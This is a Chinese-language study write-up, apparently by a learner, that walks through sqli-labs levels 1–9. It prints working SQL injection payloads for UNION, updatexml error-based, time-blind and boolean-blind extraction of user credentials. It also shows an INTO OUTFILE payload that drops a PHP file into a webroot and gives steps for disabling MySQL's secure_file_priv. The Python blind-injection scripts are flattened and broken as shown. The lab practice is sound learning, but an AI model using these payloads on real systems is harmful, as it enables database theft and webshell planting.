复现一下最近学习的漏洞（sqlab 1-10）

第一个问题：为什么不能用#来闭合单引号呢？

在进行URL地址栏传参的时候，是有一套编码规范的。他不会编码英文、数字和某些符号。但是#它会进行编码。也就是%23。（先转ascii码，然后再转十六进制，之后加上%就是%23）

第二个问题：为什么可以使用--+来进行闭合？

sqli-lab第一关

先判断是否存在sql注入。输入的id的值不同页面会发生变化。

然后再判断sql语句是否拼接，是字符型还是数字型：很明显这里是数字型注入，用 ‘ 进行闭合

联合注入：

可以使用order by 来找出该表的列数：第四列报错了，而第三列没有报错，说明该表有三列。

爆出数据库名和版本号：

爆出表名：

?id=-1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema = 'security' --+

爆出列名：现在我们就知道了security库下的users表中，有id，username，password这三个列名，我们直接进行查询即可

?id=-1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name ='users' --+

最后我们就可以直接进行查询了：

?id=-1' union select 1,database(),group_concat(username,password) from users --+;

MySQL中有这样五个数据库：

information_schema, challenges, mysql, performance_schema, sys。这里我们先重点关注information_schema这张表。

table_schema 所有的数据库名
table_name 所有库下的所有表名
column_name 所有表下的所有列名

#这里我先在本地的MySQL中的information_schema库中，进行一个查询。
select table_name from tables where table_schema = 'security';
select column_name from columns where column_schema='security' and table_name='users';
select username,password from security.users;

最终也是可以查到security库中users表的数据的。

sqli-lab第二关

首先我们还是基本操作，先判断类型，这里我们闭合之后，发现还是报错，说明这是一个数字型。

所以这里我们就不用加 ’ 和 --+ 了，直接进行注入即可。

具体步骤和第一关相同，这里就不多说了。

sqli-lab第三关

输入?id=1'的时，查看页面报错信息。可推断出sql语句是单引号字符型且有括号，所以我们需要闭合单引号且也要考虑括号。

后续步骤同前两关相同。

sqli-lab第四关

这关如果输入不符合sql语法是会在页面上返回报错信息的，根据这个就可以明确知道要闭合什么符号，比如这关闭合是")，但是这关输入id=1'是不会报错，字段本身是int类型

最后找到合适的闭合方式，后续步骤相同。

sqli-lab第五关

第五关和前面四关不同，该关卡的查询结果不会回显。

但报错还是会回显，这里可以使用报错注入。这里我们updatexml()，报错注入出当前的数据库名

这里因为显示子查询返回超过1行，所以说这里的数据就只有1列

报表名：爆出所有的表名

?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) 
from information_schema.tables where table_schema='security') ,0x7e),1) --+

爆列名：

?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from 
information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) --+

报字段名：

?id=1' and updatexml(1,concat(0x7e,(select group_concat(username,password)from 
users),0x7e),1) --+

这里就发现，输出的长度被限制了。这里我们可以用 substr() 这个函数来对数据进行截取。以此每32位来截取数据。

?id=1' and updatexml(1,concat(0x7e,substr((select group_concat(username,0x3a,password)
from users),1,32),0x7e),1) --+

sqli-lab第六关

这一关只有闭合方式改变了一下，其余内容不变。同样是报错注入，和上一关相同

sqli-lab第七关

还是先判断一下闭合，为‘))

在高版本的mysql中默认为NULL，就是不让导入和导出

解决办法：
在Windows下可在my.ini的[mysqld]里面，添加secure_file_priv=
在linux下可在/etc/my.cnf的[mysqld]里面，添加secure_file_priv=

这里我们修改一下my.ini文件后，重启一下MySQL，就发现修改成功了。

开始注入

?id=1')) union select 1,2,"<?php phpinfo(); ?>" into outfile 
"E:\\PHPStudy\\phpstudy_pro\\WWW\\m.php"--+

这里显示有语法错误，不用管这个，直接访问webshell文件即可。这里我写的是phpinfo()，所以访问的就是php界面。

sqli-lab第八关

第八关发现报错注入后，错误不显示了。所以报错注入和联合查询都不行了。加单引号后，报错

这里我写了一个python的脚本来跑数据库名（二分查找效率更快），最后也是成功跑出表名。后面就可以使用类似的方法来跑列名和字段名了。

import requestsurl = 'http://sqli/Less-8/'def inject_database(url):name = ''for i in range(1, 20):low = 32high = 128mid = (low + high) // 2while low < high:payload = "1' and ascii(substr(database(), %d, 1)) > %d -- " % (i, mid)res = {"id": payload}r = requests.get(url, params=res)if "You are in..........." in r.text:low = mid + 1else:high = midmid = (low + high)//2if mid == 32:breakname = name + chr(mid)print(name)inject_database(url)

sqli-lab第九关

发现这关不管正确还是失败，都不会显示

采用时间盲注，来寻找注入点

这里还是写python脚本来跑，和第八关类似，但需要稍作修改。因为此时的页面是不会变化的，所以就根据时间的特征来进行判断，修改一下pyload，然后增加一个时间模块即可。最后就能跑出数据库名。

import requests
import timeurl = 'http://sqli/Less-9/'def inject_database(url):name = ''for i in range(1, 20):low = 32high = 128mid = (low + high) // 2while low < high:payload = "1' and if(ascii(substr(database(), %d, 1)) > %d, sleep(1),0)-- " % (i, mid)res = {"id": payload}start_time = time.time()r = requests.get(url, params=res)end_time = time.time()if end_time - start_time >= 1:low = mid + 1else:high = midmid = (low + high)//2if mid == 32:breakname = name + chr(mid)print(name)inject_database(url)